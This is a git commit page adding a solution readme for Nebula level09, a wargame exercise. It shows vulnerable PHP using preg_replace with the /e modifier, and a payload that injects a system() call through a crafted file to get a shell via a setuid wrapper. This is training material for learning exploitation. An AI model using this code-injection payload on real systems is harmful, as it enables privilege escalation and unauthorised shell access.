Commit `d50f607`

Richard Luby <richluby@gmail.com>

2016-09-29 09:47:47

added solution for level09

solution uses a SETUID file in the flag09 home folder and a vulnerability in 'preg_replace' that permits evaluating strings as PHP commands

master

1 parent 911dacc

Changed files (1)

exploit_exercises

nebula

level09

readme.md

@@ -1,18 +1,22 @@
 
-----------------------------------------------
+# Nebula - Level09 - Vulnerable SETUID
 
-About
-Source code
-There’s a C setuid wrapper for some vulnerable PHP code…
-To do this level, log in as the level09 account with the password
-level09. Files for this level can be found in /home/flag09.
+## About
+
+There’s a C setuid wrapper for some vulnerable PHP code.
+To do this level, log in as the `level09` account with the password
+`level09`. Files for this level can be found in ``/home/flag09`.
+
+## Source code
+
+```
 <?php
 
 function spam($email)
 {
   $email = preg_replace("/\./", " dot ", $email);
   $email = preg_replace("/@/", " AT ", $email);
-  
+
   return $email;
 }
 
@@ -32,3 +36,14 @@ $output = markup($argv[1], $argv[2]);
 print $output;
 
 ?>
+```
+
+## Solution
+
+The line `$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);` contains a
+vulnerability in the expression `"/(\[email (.*)\])/e"`. The `/e` is an argument that allows the
+second expression to execute [[1](http://www.madirish.net/402)]. Use PHP
+[complex curly syntax](http://stackoverflow.com/a/2596838)
+with a system call in a specially crafted file to gain a shell.  
+Use `echo [email {${system($use_me)}}] > <file name>`, and then execute the program with
+`/home/flag09/flag09 <path to file> /bin/bash`.

Commit d50f607

Commit `d50f607`